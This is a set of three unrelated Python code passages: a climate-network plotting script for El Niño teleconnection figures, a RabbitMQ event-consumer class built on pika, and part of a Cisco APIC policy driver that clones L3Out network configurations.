'/../outputs/t2m_1950-2020_nino_nets/t2m_Nino_EP_fekete_2.5_spearman_twosided_de_0.02_weighted_lb_2_nx.graphml'
self.cpNetwork = PATH + \
'/../outputs/t2m_1950-2020_nino_nets/t2m_Nino_CP_fekete_2.5_spearman_twosided_de_0.02_weighted_lb_2_nx.graphml'
self.normalNetwork = PATH + \
'/../outputs/t2m_1950-2020_nino_nets/t2m_standard_fekete_2.5_spearman_twosided_de_0.02_weighted_lb_2_nx.graphml'
args = Args()
else:
parser = make_argparser()
args = parser.parse_args()
# %%
# Load dataset corresponding to the networks
ds = AnomalyDataset(load_nc=args.dataset)
# %%
# Load Enso Index
fname = PATH + "/../data/ersst5.nino.mth.91-20.ascii"
nino_indices = ut.get_nino_indices(
fname, time_range=[ds.ds.time[0].data, ds.ds.time[-1].data], time_roll=0)
enso_dict = ut.get_enso_years(nino_indices, month_range=[12, 2],
mean=True, threshold=0.5,
min_diff=0.1,
drop_volcano_year=False)
# %%
# Load EP, CP, standard network
nino_networks = [
{'name': 'standard',
'title': 'Normal',
'file': args.normalNetwork},
{'name': 'Nino_EP',
'title': 'EP',
'file': args.epNetwork},
{'name': 'Nino_CP',
'title': 'CP',
'file': args.cpNetwork},
]
for net in nino_networks:
# naming of net files
season_type = net['name']
time_period = enso_dict[season_type]
ds_tmp = copy.deepcopy(ds)
ds_tmp.use_time_snippets(time_period)
# Load networks
net['cnx'] = clim_networkx.Clim_NetworkX(dataset=ds_tmp,
nx_path_file=net['file']
)
# Normalize curvature
net['cnx'].normalize_edge_attr(attributes=['formanCurvature'])
# Get quantiles
q_vals = [0.1, 0.9]
net['cnx'].get_node_attr_q(
edge_attrs=['formanCurvature',
'formanCurvature_norm'],
q_values=q_vals, norm=True
)
# Get link length distribution of quantiles
ll = {}
for q in [None]+q_vals:
print(f'Compute link length q={q}')
link_length = net['cnx'].get_link_length_distribution(
q=q, var='formanCurvature')
ll[q] = link_length
net['ll'] = ll
# %%
##########################################################################################
# Figure 2
##########################################################################################
figsize = (11, 5)
ncols = 3
nrows = 3
num_links = 10
var = 'formanCurvature'
q_vals = [None, 0.9, 0.1]
central_longitude = 0
fig = plt.figure(figsize=(figsize[0]*ncols, figsize[1]*nrows))
gs = fig.add_gridspec(nrows, ncols+1,
height_ratios=[20, 20, 20],
width_ratios=[15, 15, 15, 1],
hspace=.4, wspace=0.1)
ax1 = fig.add_subplot(gs[0, 0])
ax2 = fig.add_subplot(gs[0, 1])
ax3 = fig.add_subplot(gs[0, 2])
ax4 = fig.add_subplot(gs[1, 0],
projection=ccrs.EqualEarth(central_longitude=central_longitude))
ax7 = fig.add_subplot(gs[2, 0],
projection=ccrs.EqualEarth(central_longitude=central_longitude))
ax5 = fig.add_subplot(gs[1, 1],
projection=ccrs.EqualEarth(central_longitude=central_longitude))
ax8 = fig.add_subplot(gs[2, 1],
projection=ccrs.EqualEarth(central_longitude=central_longitude))
ax6 = fig.add_subplot(gs[1, 2],
projection=ccrs.EqualEarth(central_longitude=central_longitude))
ax9 = fig.add_subplot(gs[2, 2],
projection=ccrs.EqualEarth(central_longitude=central_longitude))
axes = np.array([[ax1, ax4, ax7],
[ax2, ax5, ax8],
[ax3, ax6, ax9]])
cmaps = ['Reds', 'Blues']
mrks = ['o', 'x']
colors = ['r', 'b']
labels = ['All', f'q>{q_vals[1]}', f'q<{q_vals[2]}']
for idx, nino in enumerate(nino_networks):
axs = axes[idx]
cnx = nino['cnx']
season_type = nino['name']
np_net_files = []
link_length_0 = nino['ll'][q_vals[0]]
link_length_pos = nino['ll'][q_vals[1]]
link_length_neg = nino['ll'][q_vals[2]]
link_lengths = [
link_length_0,
link_length_pos,
link_length_neg,
]
for i, q in enumerate(q_vals[1:]):
el = cnx.get_q_edge_list(var, q=q)[0::num_links]
link_map = cnx.get_el_map(el=el, binary=False)
cplt.plot_edges(ds, list(el),
ax=axs[i+1],
significant_mask=True,
projection='EqualEarth',
central_longitude=central_longitude,
plt_grid=True,
lw=0.08,
alpha=.7,
color=colors[i])
im_nino = cplt.plot_map(ds, link_map,
projection='EqualEarth', plt_grid=True,
ax=axs[i+1],
plot_type='scatter',
significant_mask=True,
cmap=cmaps[i], levels=2,
vmin=0, vmax=3e1,
marker='o',
title=' ',
bar=False,
alpha=.5,
size=5,
fillstyle='none',
central_longitude=central_longitude)
if idx == 0:
ax_cbar = fig.add_subplot(gs[i+1, 3], )
cbar = plt.colorbar(im_nino['im'], cax=ax_cbar, orientation='vertical',
label=f'# Links to node ({labels[i+1]})',
)
if idx == 0:
ylabel = 'counts'
yticks = True
else:
ylabel = None
yticks = False
cplt.plot_hist(link_lengths,
ax=axs[0],
density=False,
# nbins=100,
bw=150, # km bin width
xlim=(0.1, 2.1e4),
ylim=(1e1, 1e5),
log=False,
ylog=True,
bar=False,
label_arr=labels,
xlabel='link length [km]',
ylabel=ylabel,
figsize=(9, 5),
loc='upper right',
color_arr=['k', 'tab:red', 'tab:blue'],
yticks=yticks,
title=nino['title'],
sci=3)
cplt.enumerate_subplots(axes.T, pos_x=-0.1, pos_y=1.07)
# %%
##########################################################################################
# Figure 3
##########################################################################################
m_name = 'norm'
net_measures = {
'standard': [dict(var='formanCurvature_norm_q0.9',
vmin=.5,
vmax=.6,
vmin_zonal=.42,
vmax_zonal=.55,
cmap='Reds', label=r"$\tilde{f}_i^+$"),
dict(var='formanCurvature_norm_q0.1',
vmin=-.25,
vmax=-.07,
vmin_zonal=None,
vmax_zonal=.0,
cmap='Blues_r', label=r"$\tilde{f}_i^-$"),
],
'Nino_EP': [dict(var='formanCurvature_norm_q0.9',
vmin=.23,
vmax=.37,
vmin_zonal=None,
vmax_zonal=None,
cmap='Reds', label=r"$\tilde{f}_i^+$"),
dict(var='formanCurvature_norm_q0.1',
vmin=-.5,
vmax=-.4,
vmin_zonal=None,
vmax_zonal=None,
cmap='Blues_r', label=r"$\tilde{f}_i^-$"),
],
'Nino_CP': [dict(var='formanCurvature_norm_q0.9',
vmin=.53,
vmax=.63,
vmin_zonal=None,
vmax_zonal=None,
cmap='Reds', label=r"$\tilde{f}_i^+$"),
dict(var='formanCurvature_norm_q0.1',
vmin=-.26,
vmax=-.16,
vmin_zonal=-.3,
vmax_zonal=None,
cmap='Blues_r', label=r"$\tilde{f}_i^-$"),
],
}
fig = plt.figure(figsize=(len(net_measures)*7, 15))
gs = gridspec.GridSpec(3, len(net_measures),
height_ratios=[3, 3, 4],
hspace=0.3, wspace=0.3)
axs = []
clrs = ['darkred', 'darkblue']
for j, nino in enumerate(nino_networks):
net_measure = net_measures[nino['name']]
axlat1 = fig.add_subplot(gs[-1, j])
axlat1 = cplt.prepare_axis(axlat1,
xlabel=r'zonal median',
ylabel='latitude',
xlabel_pos='right',
)
divider = make_axes_locatable(axlat1)
axlat2 = divider.new_horizontal(size="100%", pad=0.2)
fig.add_axes(axlat2)
for i, m in enumerate(net_measure):
axmap = fig.add_subplot(gs[i, j],
projection=ccrs.EqualEarth(central_longitude=180))
cplt.plot_map(ds, nino['cnx'].ds_nx[m['var']],
ax=axmap,
plot_type='contourf',
cmap=m['cmap'], label=f"node curvature {m['label']}",
projection='EqualEarth',
plt_grid=True,
significant_mask=True,
levels=8,
tick_step=2,
vmin=m['vmin'],
vmax=m['vmax'],
sci=None,
round_dec=3,
central_longitude=180,
orientation='horizontal',
pad='20%'
)
axs.append(axmap)
da = sputils.interp_fib2gaus(
nino['cnx'].ds_nx[m['var']],
grid_step=ds.grid_step
)
if i == 0:
da = xr.where(~np.isnan(da), da, da.min())
axmap.set_title(nino['title'])
else:
da = xr.where(~np.isnan(da), da, da.max())
zonal_mean = sputils.compute_meridional_quantile(da, q=0.5)
zonal_mean, zonal_std = sputils.compute_meridional_mean(da)
zonal_low_quantile = sputils.compute_meridional_quantile(da, q=0.25)
zonal_up_quantile = sputils.compute_meridional_quantile(da, q=0.75)
if i == 0:
cplt.prepare_axis(axlat2)
im = axlat2.plot(zonal_mean, zonal_mean['lat'],
color=clrs[i], label=f"{m['label']}")
axlat2.fill_betweenx(zonal_mean['lat'],
zonal_mean - zonal_std/2,
zonal_mean + zonal_std/2,
color=im[0].get_color(),
alpha=0.5)
axlat2.set_xlim(m['vmin_zonal'], m['vmax_zonal'])
cplt.place_legend(axlat2,
fontsize=14,
loc='upper right',
)
else:
im = axlat1.plot(zonal_mean, zonal_mean['lat'],
color=clrs[i], label=f"{m['label']}")
axlat1.fill_betweenx(zonal_mean['lat'],
zonal_mean - zonal_std/2,
zonal_mean + zonal_std/2,
color=im[0].get_color(),
alpha=0.5)
axlat1.set_xlim(m['vmin_zonal'], m['vmax_zonal'])
cplt.place_legend(axlat1,
fontsize=14,
loc='upper left',
)
# hide the spines between ax and axlat2
axlat1.spines['right'].set_visible(False)
axlat2.spines['left'].set_visible(False)
axlat1.yaxis.tick_left()
axlat1.tick_params(labelright=False, right=False)
axlat2.tick_params(labelleft=False, left=False)
d = .015 # how big to make the diagonal lines in axes coordinates
# arguments to pass plot, just so we don't keep repeating them
kwargs_ax = dict(transform=axlat1.transAxes,
color='k', clip_on=False)
axlat1.plot((1-d, 1+d), (-d, +d), **kwargs_ax)
# axlat.plot((1-d, 1+d), (1-d, 1+d), **kwargs_ax)
# switch to the bottom axes
kwargs_ax.update(transform=axlat2.transAxes)
axlat2.plot((-d, +d), (-d, +d), **kwargs_ax)
# axlat2.plot((-d, +d), (1-d, 1+d), **kwargs_ax)
axlat1.set_yticks([-60, -30, 0, 30, 60])
axlat1.set_yticklabels([r'$60^\circ$S', r'$30^\circ$S', r'$0^\circ$',
r'$30^\circ$N', r'$60^\circ$N'])
axs.append(axlat1)
cplt.enumerate_subplots(np.array(axs).reshape(
len(net_measures), 3).T, pos_x=-0.1, pos_y=1.08)
# %%
##########################################################################################
# Fig 4. Combine regions in one plot
##########################################################################################
q = 0.1
attribute = f'formanCurvature'
locations = [
dict(name='NINO3', lon=[-150, -90], lat=[-5, 5],
central_lon=180, link_step=4, vmax=1E2),
dict(name='NINO4', lon=[160, -150], lat=[-5, 5],
central_lon=180, link_step=1, vmax=1E2),
dict(name='IO', lon=[60, 100], lat=[-20, 10],
central_lon=100, link_step=5, vmax=1E2),
dict(name='Labrador sea', lon=[-100, -40], lat=[50, 80],
central_lon=-40, link_step=2, vmax=1E2),
]
# create fig.
colors = ['darkmagenta', 'darkgreen']
cmap = ['RdPu', 'Greens']
mrks = ['o', 'x']
binary = False
alpha = 0.5
fig = plt.figure(figsize=(15, 10))
gs = fig.add_gridspec(3, 2, height_ratios=[20, 20, 1],
hspace=0.1, wspace=0.1)
axs = []
for i, loc in enumerate(locations):
ax = fig.add_subplot(
gs[int(i/2), int(i % 2)],
projection=ccrs.EqualEarth(central_longitude=loc['central_lon'])
)
ax.set_global()
axs.append(ax)
for j, nino in enumerate(nino_networks[:2]):
edge_dic = nino['cnx'].get_edges_nodes_for_region(
lon_range=loc['lon'], lat_range=loc['lat'],
attribute=attribute, q=q,
binary=binary)
if len(edge_dic['el']) == 0:
continue
attr = attribute if q is None else f"{attribute}_q{q}"
# Plot nodes where edges go to
if binary:
im = cplt.plot_map(ds, edge_dic['target_map'],
ax=ax,
label=f'log(# Links)',
projection='EqualEarth', plt_grid=True,
plot_type='points', significant_mask=True,
marker=mrks[j],
size=2, color=colors[j],
fillstyle='none',
bar=False,
alpha=alpha,
)
else:
im = cplt.plot_map(ds, edge_dic['target_map'],
ax=ax,
label=f'# Teleconnections',
projection='EqualEarth', plt_grid=True,
plot_type='scatter', significant_mask=True,
cmap=cmap[j],
vmin=0, vmax=loc['vmax'],
bar=False,
alpha=alpha,
marker=mrks[j], size=10, fillstyle='none',
)
if j == 0:
im_ep = im
elif j == 1:
im_cp = im
im = cplt.plot_edges(ds, edge_dic['el'][0::loc['link_step']],
ax=im['ax'],
significant_mask=True,
orientation='vertical',
projection='EqualEarth',
plt_grid=True,
lw=0.1,
alpha=0.6,
color=colors[j],
)
cplt.plot_rectangle(ax=im['ax'],
lon_range=loc['lon'],
lat_range=loc['lat'],
color='k',
lw=3)
# Colorbar
ax = fig.add_subplot(gs[-1, 0])
cbar = plt.colorbar(im_ep['im'], cax=ax, orientation='horizontal',
shrink=0.8, label='# Teleconnections (EP)')
ax = fig.add_subplot(gs[-1, 1])
cbar = plt.colorbar(im_cp['im'], cax=ax, orientation='horizontal',
shrink=0.8, label='# Teleconnections (CP)')
cplt.enumerate_subplots(np.array(axs), fontsize=24)
plt.tight_layout()
# %%
##########################################################################################
# Figure 5
# Linear Regression Coefficient analysis
##########################################################################################
reload(cplt)
reload(ut)
attribute = f'formanCurvature'
locations = [
# dict(name='Eastern Pacific', lon=[-145, -80], lat=[-10, 10],
# central_lon=180, link_step=7, vmax=1E2),
# dict(name='Central Pacific', lon=[160, -145], lat=[-10, 10],
# central_lon=180, link_step=1, vmax=1E2),
dict(name=rf'$Ni\~no$ 3', lon=[-150, -90], lat=[-5, 5],
central_lon=180, link_step=4, vmax=1E2),
dict(name=rf'$Ni\~no$ 4', lon=[160, -150], lat=[-5, 5],
central_lon=180, link_step=1, vmax=1E2),
dict(name='Indian Ocean', lon=[60, 100], lat=[-20, 10],
central_lon=100, link_step=5, vmax=1E2),
# dict(name='PO', lon=[-170, -120], lat=[40, 70],
# central_lon=180, link_step=3, vmax=1E2),
dict(name='Labrador Sea', lon=[-100, -40], lat=[50, 80],
central_lon=-40, link_step=2, vmax=1E2),
# dict(name='Northern Atlantic', lon=[-10, 40], lat=[50, 70],
# central_lon=0, link_step=3, vmax=1E2),
]
method = 'rank'
nrows = 4
ncols = 2
im = cplt.create_multi_map_plot_gs(nrows=nrows, ncols=ncols,
central_longitude=180,
figsize=(9, 6),
orientation='horizontal',
)
lr_range = .4
# for i, loc in enumerate(locations):
for i, loc in enumerate(locations):
for j, nino in enumerate([nino_networks[0],
nino_networks[1]]):
link_dict = nino['cnx'].get_edges_nodes_for_region(
lon_range=loc['lon'], lat_range=loc['lat'],
)
var = 'anomalies'
sids = link_dict['sids'][:]
da_lr = ut.get_LR_map(ds=nino['cnx'].ds,
var=var,
sids=sids,
method=method)
im_comp = cplt.plot_map(ds,
da_lr.mean(dim='sids'),
ax=im['ax'][i*ncols + j],
plot_type='contourf',
cmap='RdBu_r',
title=f'{loc["name"]} ({nino["name"]})',
projection='EqualEarth',
plt_grid=True,
significant_mask=False,
levels=14,
tick_step=2,
round_dec=2,
vmin=-lr_range,
vmax=lr_range,
bar=False,
)
cplt.plot_rectangle(ax=im['ax'][i*ncols + j],
lon_range=loc['lon'],
lat_range=loc['lat'],
color='k',
lw=4)
label = f'{method}-normalized Linear Regression coefficient'
cbar = cplt.make_colorbar_discrete(ax=im['ax'][-1],
im=im_comp['im'],
set_cax=False,
orientation='horizontal',
vmin=-lr_range,
vmax=lr_range,
label=label,
extend='both',
round_dec=2,
)
# %%
#######################################################
# Figures for Supporting Information
#######################################################
net_measures = {
'degree': dict(vmin=0, vmax=None, cmap='Oranges', label="Deg(v)"),
'betweenness': dict(vmin=0, vmax=0.003, cmap='Greys', label=f"log(BC(v)) + 1"),
'clustering': dict(vmin=0.3, vmax=0.7, cmap='Greens', label="Clust. Coeff."),
'formanCurvature_norm': dict(vmin=None, vmax=None,
cmap='coolwarm', label=f"Forman Curv. norm"),
# 'formanCurvature': dict(vmin=-4e2, vmax=1E2,
# cmap='coolwarm', label=f"Forman Curv."),
# 'formanCurvature_rank': dict(vmin=0, vmax=1,
# cmap='coolwarm', label=f"Forman Curv. rank"),
# 'formanCurvature_q0.9': dict(vmin=0, vmax=10,
| |
<filename>amqpconsumer/events.py
import logging
import pika
import json
logger = logging.getLogger(__name__)
class EventConsumer(object):
"""Basic consumer with event loop for RabbitMQ events.
It takes an event handler that will be given all events from the provided
queue. If the handler raises an exception, the run()-method that runs the
event loop wil stop with that exception. To then gracefully shutdown the
connection to RabbitMQ, call stop().
Messages that are not valid JSON will be ignored.
Based on the async consumer example from the pika docs:
https://pika.readthedocs.org/en/latest/examples/asynchronous_consumer_example.html
Usage:
>>> def handler(event):
>>> print event
>>> c = EventConsumer('amqp://rabbitmq.example.cm:6782/vhost', 'myqueue', handler)
>>> try:
>>> c.run() # Will run the event loop, passing each event into handler()
>>> except KeyboardInterrupt:
>>> c.stop() # Gracefully disconnect from RabbitMQ
"""
# This class will string together all the async callbacks that are needed
# before consuming. The flow is this:
#
# connect -> on_connection_open ->
# open_channel -> on_channel_open ->
# setup_exchange -> on_exchange_declareok -> (these 2 are skipped if no exchange is provided)
# setup_queue -> on_queue_declareok ->
# on_bindok (skipped if no exchange is provided) ->
# start_consuming
def __init__(self, amqp_url, queue, handler, exchange=None, exchange_type=None, routing_key=None):
"""Create a new instance of the consumer class, passing in the URL
of RabbitMQ, the queue to listen to, and a callable handler that
handles the events.
The queue will be declared before consuming. If exchange, exchange_type,
and routing_key are provided, it will also declare the exchange and bind
the queue to it. Queue and exchange will be declared durable.
:param str amqp_url: The AMQP url to connect with
:param str queue: The queue to listen to
:param function handler: The event handler that handles events
:param str exchange: Optional name of exchange to declare
:param str exchange_type: Optional type of exchange to declare
:param str routing_key: Optional routing key of binding to create between exchange and queue
"""
self._connection = None
""":type: pika.SelectConnection"""
self._channel = None
self._consumer_tag = None
self._closing = False
self._handler = handler
self._queue = queue
self._url = amqp_url
if ((exchange or exchange_type or routing_key)
and not (exchange and exchange_type and routing_key)):
raise RuntimeError("Either provide all of exchange, exchange_type, and routing_key, "
"or provide none of them to not declare and bind an exchange")
self._exchange = exchange
self._exchange_type = exchange_type
self._routing_key = routing_key
def connect(self):
"""Connect to RabbitMQ, returning the connection handle.
When the connection is established, the on_connection_open method
will be invoked by pika.
:rtype: pika.SelectConnection
"""
logger.debug('Connecting to %s', self._url)
return pika.SelectConnection(parameters=pika.URLParameters(self._url),
on_open_callback=self.on_connection_open)
def on_connection_open(self, _):
"""Called by pika once the connection to RabbitMQ has been established.
It passes the handle to the connection object in case we need it,
but in this case, we'll just mark it unused.
:type _: pika.SelectConnection
"""
logger.debug('Connection opened')
self.add_on_connection_close_callback()
self.open_channel()
def add_on_connection_close_callback(self):
"""Add an on close callback that will be invoked by pika when
RabbitMQ closes the connection to the consumer unexpectedly.
"""
logger.debug('Adding connection close callback')
self._connection.add_on_close_callback(callback=self.on_connection_closed)
def on_connection_closed(self, _, error):
"""Called by pika when the connection to RabbitMQ is closed
unexpectedly.
Since it is unexpected, we will reconnect to RabbitMQ if it disconnects.
:param pika.connection.Connection _: The closed connection object
:param Exception | None error: The Exception containing the reason the connection was closed
"""
self._channel = None
if self._closing:
self._connection.ioloop.stop()
else:
logger.warning('Connection closed, reopening in 5 seconds: {}'.format(error))
self._connection.ioloop.call_later(delay=5, callback=self.reconnect)
def reconnect(self):
"""Will be invoked by the IOLoop timer if the connection is closed.
See the on_connection_closed method.
"""
# This is the old connection IOLoop instance, stop its ioloop
self._connection.ioloop.stop()
if not self._closing:
# Create a new connection
self._connection = self.connect()
# There is now a new connection, needs a new ioloop to run
self._connection.ioloop.start()
def on_channel_open(self, channel):
"""Called by pika when the channel has been opened.
The channel object is passed in so we can make use of it. Since the
channel is now open, we'll start consuming.
:param pika.channel.Channel channel: The channel object
"""
logger.debug('Channel opened')
self._channel = channel
self.add_on_channel_close_callback()
self.setup_qos()
def setup_qos(self):
"""Configure QoS to limit number of messages to prefetch """
self._channel.basic_qos(prefetch_count=1, callback=self.on_qos_set)
def on_qos_set(self, _):
"""Will be invoked when the QoS is configured"""
if self._exchange:
self.setup_exchange()
else:
self.setup_queue()
def setup_exchange(self):
"""Declare the exchange
When completed, the on_exchange_declareok method will be invoked by pika.
"""
logger.debug('Declaring exchange %s', self._exchange)
self._channel.exchange_declare(exchange=self._exchange,
exchange_type=self._exchange_type,
callback=self.on_exchange_declareok,
durable=True)
def on_exchange_declareok(self, _):
"""Invoked by pika when the exchange is declared.
:param pika.frame.Method _: Exchange.DeclareOk response frame
"""
logger.debug("Exchange declared")
self.setup_queue()
def setup_queue(self):
"""Declare the queue
When completed, the on_queue_declareok method will be invoked by pika.
"""
logger.debug("Declaring queue %s" % self._queue)
self._channel.queue_declare(queue=self._queue, callback=self.on_queue_declareok, durable=True)
def on_queue_declareok(self, _):
"""Invoked by pika when queue is declared
This method will start consuming or first bind the queue to the exchange
if an exchange is provided.
After binding, the on_bindok method will be invoked by pika.
:param pika.frame.Method _: The Queue.DeclareOk frame
"""
logger.debug("Binding %s to %s with %s", self._exchange, self._queue, self._routing_key)
if self._exchange:
self._channel.queue_bind(queue=self._queue, exchange=self._exchange, routing_key=self._routing_key,
callback=self.on_bindok)
else:
self.start_consuming()
def on_bindok(self, _):
"""Invoked by pika after the queue is bound
Starts consuming.
:param pika.frame.Method _: The Queue.BindOk frame
"""
logger.debug("Queue bound")
self.start_consuming()
def add_on_channel_close_callback(self):
"""Tells pika to call the on_channel_closed method if RabbitMQ
unexpectedly closes the channel.
"""
logger.debug('Adding channel close callback')
self._channel.add_on_close_callback(callback=self.on_channel_closed)
def on_channel_closed(self, channel, closing_reason):
"""Called by pika when RabbitMQ unexpectedly closes the channel.
Channels are usually closed if you attempt to do something that
violates the protocol, such as re-declare an exchange or queue with
different parameters. In this case, we'll close the connection to
shutdown the object.
:param pika.channel.Channel: The closed channel
:param Exception | None closing reason: The Exception containing the reason the connection was closed
"""
logger.warning('Channel {} was closed: {}'.format(channel, closing_reason))
if not self._connection.is_closing and not self._connection.is_closed:
self._connection.close()
def start_consuming(self):
"""Sets up the consumer.
We do this by first calling add_on_cancel_callback so that the
object is notified if RabbitMQ cancels the consumer. Then we issue
a Basic.Consume command which returns the consumer tag that is used
to uniquely identify the consumer with RabbitMQ. We keep the value
to use it when we want to cancel consuming.
The on_message method is passed in as a callback pika will invoke
when a message is fully received.
"""
self.add_on_cancel_callback()
self._consumer_tag = self._channel.basic_consume(queue=self._queue, on_message_callback=self.on_message)
logger.info('Listening')
def add_on_cancel_callback(self):
"""Add a callback that will be invoked if RabbitMQ cancels the
consumer for some reason.
If RabbitMQ does cancel the consumer, on_consumer_cancelled will be
invoked by pika.
"""
logger.debug('Adding consumer cancellation callback')
self._channel.add_on_cancel_callback(callback=self.on_consumer_cancelled)
def on_consumer_cancelled(self, method_frame):
"""Invoked by pika when RabbitMQ sends a Basic.Cancel for a consumer
receiving messages.
:param pika.frame.Method method_frame: The Basic.Cancel frame
"""
logger.debug('Consumer was cancelled remotely, shutting down: %r', method_frame)
if self._channel:
self._channel.close()
def on_message(self, _, basic_deliver, properties, body):
"""Invoked by pika when a message is delivered from RabbitMQ.
The channel is passed for your convenience. The basic_deliver object
that is passed in carries the exchange, routing key, delivery tag
and a redelivered flag for the message. The properties passed in is
an instance of BasicProperties with the message properties and the
body is the message that was sent.
We'll json-decode the message body, and if that succeeds, call the
handler that was given to us. Messages that contain invalid json
will be discarded.
:type _: pika.channel.Channel
:type basic_deliver: pika.Spec.Basic.Deliver
:type properties: pika.Spec.BasicProperties
:type body: str|unicode
"""
logger.debug('Received message # %s from %s: %s', basic_deliver.delivery_tag, properties.app_id, body)
try:
decoded = json.loads(body.decode('-utf-8'))
except ValueError:
logger.warning('Discarding message containing invalid json: %s', body)
else:
self._handler(decoded)
self.acknowledge_message(basic_deliver.delivery_tag)
def acknowledge_message(self, delivery_tag):
"""Acknowledge the message delivery from RabbitMQ.
:param int delivery_tag: The delivery tag from the Basic.Deliver frame
"""
logger.debug('Acknowledging message %s', delivery_tag)
self._channel.basic_ack(delivery_tag=delivery_tag)
def open_channel(self):
"""Open a new channel with RabbitMQ.
When RabbitMQ responds that the channel is open, the on_channel_open
callback will be invoked by pika.
"""
logger.debug('Creating new channel')
self._connection.channel(on_open_callback=self.on_channel_open)
def run(self):
"""Start the consumer by connecting to RabbitMQ and then starting | |
doesn't allow tDn being present
if self._trim_tDn_from_dict(req_dict, 'tnFvCtxName'):
req_dict['tnFvCtxName'] = l3p_name
# this is for l3extRsNdIfPol case
self._trim_tDn_from_dict(req_dict, 'tnNdIfPolName')
# this is for l3extRsDampeningPol/l3extRsInterleakPol case
self._trim_tDn_from_dict(req_dict, 'tnRtctrlProfileName')
# this is for ospfRsIfPol case
self._trim_tDn_from_dict(req_dict, 'tnOspfIfPolName')
# this is for l3extRs[I|E]ngressQosDppPol case
self._trim_tDn_from_dict(req_dict, 'tnQosDppPolName')
# this is for bfdRsIfPol case
self._trim_tDn_from_dict(req_dict, 'tnBfdIfPolName')
# this is for bgpRsPeerPfxPol case
self._trim_tDn_from_dict(req_dict, 'tnBgpPeerPfxPolName')
# this is for eigrpRsIfPol case
self._trim_tDn_from_dict(req_dict, 'tnEigrpIfPolName')
for value in req_dict.values():
if isinstance(value, dict):
self._trim_keys_from_dict(value, keys, encap, l3p_name)
elif isinstance(value, list):
for element in value:
if isinstance(element, dict):
self._trim_keys_from_dict(element, keys,
encap, l3p_name)
return req_dict
def _clone_l3out(self, context, es, es_name, es_tenant, encap):
pre_es_name = self.name_mapper.name_mapper.pre_existing(
context, es['name'])
l3out_info = self._query_l3out_info(pre_es_name,
self.name_mapper.tenant(es), return_full=True)
old_tenant = self.apic_manager.apic.fvTenant.rn(
l3out_info['l3out_tenant'])
new_tenant = self.apic_manager.apic.fvTenant.rn(es_tenant)
old_l3_out = self.apic_manager.apic.l3extOut.rn(pre_es_name)
new_l3_out = self.apic_manager.apic.l3extOut.rn(es_name)
request = {}
request['children'] = l3out_info['l3out']
request['attributes'] = {"rn": new_l3_out}
# trim the request
keys = (['l3extInstP', 'l3extRtBDToOut',
'l3extExtEncapAllocator',
'l3extRsOutToBDPublicSubnetHolder', 'modTs',
'uid', 'lcOwn', 'monPolDn', 'forceResolve',
'rType', 'state', 'stateQual', 'tCl', 'tType',
'type', 'tContextDn', 'tRn', 'tag', 'name',
'configIssues'])
vrf = self.apic_manager.apic.fvCtx.name(
context.current.get('name'))
request = self._trim_keys_from_dict(request, keys, encap, vrf)
final_req = {}
final_req['l3extOut'] = request
request_json = jsonutils.dumps(final_req)
if old_tenant != new_tenant:
request_json = re.sub(old_tenant, new_tenant,
request_json)
request_json = re.sub(old_l3_out, new_l3_out, request_json)
request_json = re.sub('{},*', '', request_json)
self.apic_manager.apic.post_body(
self.apic_manager.apic.l3extOut.mo,
request_json,
es_tenant,
str(es_name))
def _plug_l3p_to_es(self, context, es, is_shadow=False):
l3_policy = (self.name_mapper.l3_policy(context, context.current)
if (not self._is_nat_enabled_on_es(es) or is_shadow) else
self._get_nat_vrf_for_es(context, es))
external_segments = context.current['external_segments']
ext_info = self.apic_manager.ext_net_dict.get(es['name'])
if not ext_info:
LOG.warning(UNMANAGED_SEGMENT % es['id'])
return
exposed = ext_info.get('cidr_exposed')
# Set the external fixed-ip for L3P for the non-shadow call
if not is_shadow:
ip = external_segments[es['id']]
if ip and ip[0]:
ip = ip[0]
else:
ip = getattr(context, 'assigned_router_ips', {}).get(
es['id'], [])
if ip and ip[0]:
ip = ip[0]
else:
ip = ext_info.get('cidr_exposed', '/').split('/')[0]
if not ip:
raise NoAddressConfiguredOnExternalSegment(
l3p_id=context.current['id'], es_id=es['id'])
context.set_external_fixed_ips(es['id'], [ip])
is_edge_nat = self._is_edge_nat(ext_info)
es_name = self.name_mapper.external_segment(context, es,
prefix=self._get_shadow_prefix(context,
is_shadow, context.current, is_edge_nat))
es_name_pre = self.name_mapper.name_mapper.pre_existing(
context._plugin_context, es['name'])
es_tenant = self._get_tenant_for_shadow(is_shadow, context.current, es)
nat_enabled = self._is_nat_enabled_on_es(es)
pre_existing = False if is_shadow else self._is_pre_existing(es)
with self.apic_manager.apic.transaction() as trs:
# Create External Routed Network connected to the proper
# L3 Context
is_l3out_creation_needed = not pre_existing
# don't need to explicitly create the shadow l3out in this case
# because we are going to query APIC then use the pre-existing
# l3out as a template then clone it accordingly
if (is_shadow and is_edge_nat and self._is_pre_existing(es)):
is_l3out_creation_needed = False
if is_l3out_creation_needed:
self.apic_manager.ensure_external_routed_network_created(
es_name, owner=es_tenant, context=l3_policy,
transaction=trs)
# Associate pre-existing, no-NAT L3-out with L3policy
if pre_existing and not nat_enabled:
l3out_info = self._query_l3out_info(es_name_pre,
self.name_mapper.tenant(es))
if l3out_info:
mapped_tenant = l3out_info['l3out_tenant']
self.apic_manager.set_context_for_external_routed_network(
mapped_tenant, es_name_pre, l3_policy, transaction=trs)
is_details_needed = False
if not is_shadow and not pre_existing:
encap = ext_info.get('encap') # No encap if None
is_details_needed = True
# if its edge nat then we have to flesh
# out this shadow L3 out in APIC
if is_shadow and is_edge_nat:
vlan_id = self.l3out_vlan_alloc.reserve_vlan(
es['name'], context.current['id'])
encap = 'vlan-' + str(vlan_id)
is_details_needed = True
if is_details_needed:
if self._is_pre_existing(es):
self._clone_l3out(context, es, es_name, es_tenant, encap)
else:
switch = ext_info['switch']
module, sport = ext_info['port'].split('/')
router_id = ext_info['router_id']
default_gateway = ext_info['gateway_ip']
self.apic_manager.set_domain_for_external_routed_network(
es_name, owner=es_tenant, transaction=trs)
self.apic_manager.ensure_logical_node_profile_created(
es_name, switch, module, sport, encap,
exposed, owner=es_tenant,
router_id=router_id, transaction=trs)
for route in es['external_routes']:
self.apic_manager.ensure_static_route_created(
es_name, switch,
route['nexthop'] or default_gateway,
owner=es_tenant,
subnet=route['destination'], transaction=trs)
if is_shadow:
l2ps = self._get_l2_policies(context._plugin_context,
{'id': context.current['l2_policies']})
for l2p in l2ps:
self.apic_manager.set_l3out_for_bd(
self._tenant_by_sharing_policy(l2p),
self.name_mapper.l2_policy(context, l2p),
es_name)
if nat_enabled:
if not is_shadow:
# set L3-out for NAT-BD
self.apic_manager.set_l3out_for_bd(es_tenant,
self._get_nat_bd_for_es(context, es),
(self.name_mapper.name_mapper.pre_existing(
